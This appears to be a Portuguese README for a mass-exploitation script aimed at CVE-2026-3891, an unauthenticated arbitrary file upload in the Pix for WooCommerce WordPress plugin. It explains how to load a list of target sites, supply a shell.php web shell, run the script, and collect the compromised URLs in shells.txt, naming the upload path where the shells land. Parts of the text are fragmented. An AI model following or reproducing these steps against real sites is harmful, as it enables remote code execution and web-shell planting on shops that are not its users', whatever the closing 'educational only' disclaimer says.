
Pix for WooCommerce <= 1.5.0 - Upload Arbitrário de Arquivos Não Autenticado
Pix for WooCommerce <= 1.5.0 - Upload Não Autenticado de Arquivos Arbitrários
O plugin Pix for WooCommerce para WordPress é vulnerável a upload não autenticado de arquivos arbitrários devido a:
na função lkn_pix_for_woocommerce_c6_save_settings em todas as versões até 1.5.0 inclusive.
Isso permite que atacantes remotos não autenticados façam upload de arquivos arbitrários, levando à Execução Remota de Código (RCE).
CVE-2026-38919.8 (Crítico)CVE-2026-3891.py@Kxploitpip install requests rich
Crie um arquivo:
list.txt
Exemplo:
http://example.com
https://target.com
victim-site.com
Se o protocolo estiver ausente → o script adiciona
http://automaticamente
Coloque seu arquivo de shell no mesmo diretório:
shell.php
python3 CVE-2026-3891.py
O script perguntará:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
Este projeto é fornecido apenas para fins de teste de segurança educacional e autorizado.
Nxploited